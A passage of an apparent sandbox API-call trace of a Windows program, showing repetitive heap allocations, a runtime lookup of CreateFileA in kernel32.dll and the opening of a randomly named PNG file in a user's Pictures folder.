Flags=0x0, Size=0x40) returned 0x7ab260 [0039.759] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0039.759] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0039.759] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0039.759] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0039.759] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0039.759] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0039.759] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0039.759] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0039.759] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0039.759] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0039.759] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0039.759] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0039.759] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0039.759] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0039.759] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0039.759] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0039.759] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0039.759] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0039.759] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0039.759] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0039.759] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0039.759] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0039.759] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0039.759] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0039.759] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0039.759] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0039.759] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0039.760] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0039.760] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0039.760] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5bb8 [0039.760] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0039.760] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0039.760] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0039.760] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0039.760] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0039.760] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0039.760] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0039.760] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0039.760] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0039.760] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0039.760] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0039.760] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0039.760] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0039.760] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0039.760] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0039.760] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0039.760] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0039.760] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0039.760] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0039.760] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0039.760] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0039.760] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0039.760] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0039.760] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0039.760] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0039.760] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0039.760] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0039.760] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0039.760] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0039.760] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0039.761] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0039.761] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0039.761] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0039.761] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0039.761] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0039.761] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0039.761] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0039.761] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0039.761] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0039.761] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0039.761] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0039.761] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0039.761] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0039.761] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0039.761] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0039.761] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0039.761] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0039.761] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0039.761] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0039.761] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0039.761] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0039.761] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0039.761] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0039.761] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0039.761] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0039.761] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0039.761] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0039.761] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0039.761] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0039.761] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0039.761] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0039.761] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0039.762] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0039.762] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0039.762] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0039.762] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0039.762] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0039.762] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0039.762] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0039.762] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0039.762] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0039.762] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0039.762] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0039.762] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0039.762] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0039.762] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0039.762] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0039.762] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0039.762] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0039.762] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0039.762] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0039.762] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0039.762] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0039.762] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x889550 [0039.762] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x889550, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0039.762] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0039.762] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFile") returned 0x0 [0039.762] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0039.763] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0039.763] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0039.763] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0039.763] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0039.763] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0039.763] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0039.763] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889550 [0039.763] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x889550, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0039.763] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0039.763] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileA") returned 0x76e253c6 [0039.763] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0039.763] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0039.763] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0039.763] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0039.763] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0039.763] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0039.763] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0039.763] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0039.763] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0039.763] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0039.763] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0039.763] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0039.763] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10001) returned 0xaa0008 [0039.763] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\80l2TDxo4fCaf.png", cchWideChar=105, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 105 [0039.763] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x69) returned 0x7db378 [0039.763] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\80l2TDxo4fCaf.png", cchWideChar=105, lpMultiByteStr=0x7db378, cbMultiByte=105, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\80l2TDxo4fCaf.png", lpUsedDefaultChar=0x0) returned 105 [0039.763] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db378 | out: hHeap=0x770000) returned 1 [0039.763] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0039.763] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0039.764] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0039.764] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0039.764] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0039.764] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0039.764] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0039.764] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0039.764] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\80l2TDxo4fCaf.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\oaci\\4hhx5h ujxbt\\a-rptl9rgzl\\eqssafks-mgdt6pjw\\80l2tdxo4fcaf.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0039.764] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0039.764] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0039.764] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0039.764] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0039.764] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0039.764] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0039.764] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0039.764] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0039.764] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0039.764] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0039.764] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0039.764] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0039.764] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0039.764] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0039.764] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xaa0008, cbMultiByte=105, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0039.764] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xd2) returned 0x7c5448 [0039.764] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xaa0008, cbMultiByte=105, lpWideCharStr=0x7c5448, cchWideChar=105 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\80l2TDxo4fCaf.png") returned 105 [0039.764] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0039.764] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xe0) returned 0x7c50e0 [0039.764] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0039.764] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa0008 | out: hHeap=0x770000) returned 1 [0039.764] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0039.765] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0039.765] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0039.765] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0039.765] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0039.765] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0039.765] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0039.765] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0039.765] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0039.765] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0039.765] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0039.765] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0039.765] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0039.765] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0039.765] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0039.765] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0039.765] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0039.765] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0039.765] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0039.765] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0039.765] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0039.765] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0039.765] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0039.765] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0039.765] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0039.765] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0039.765] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0039.765] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0039.765] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0039.765] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0039.765] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0039.765] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0039.765] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0039.765] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0039.766] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0039.766] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0039.766] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0039.766] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0039.766] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0039.766] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0039.766] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0039.766] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0039.766] FreeLibrary (hLibModule=0x76e10000) returned 1 [0039.766] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0039.766] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0039.766] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0039.766] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0039.766] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0039.766] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0039.766] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0039.766] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0039.766] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0039.766] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0039.766] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0039.766] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0039.766] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0039.766] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0039.766] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0039.766] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0039.766] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0039.766] HeapFree (in: hHeap=0x770000, dwFlags=0x0, 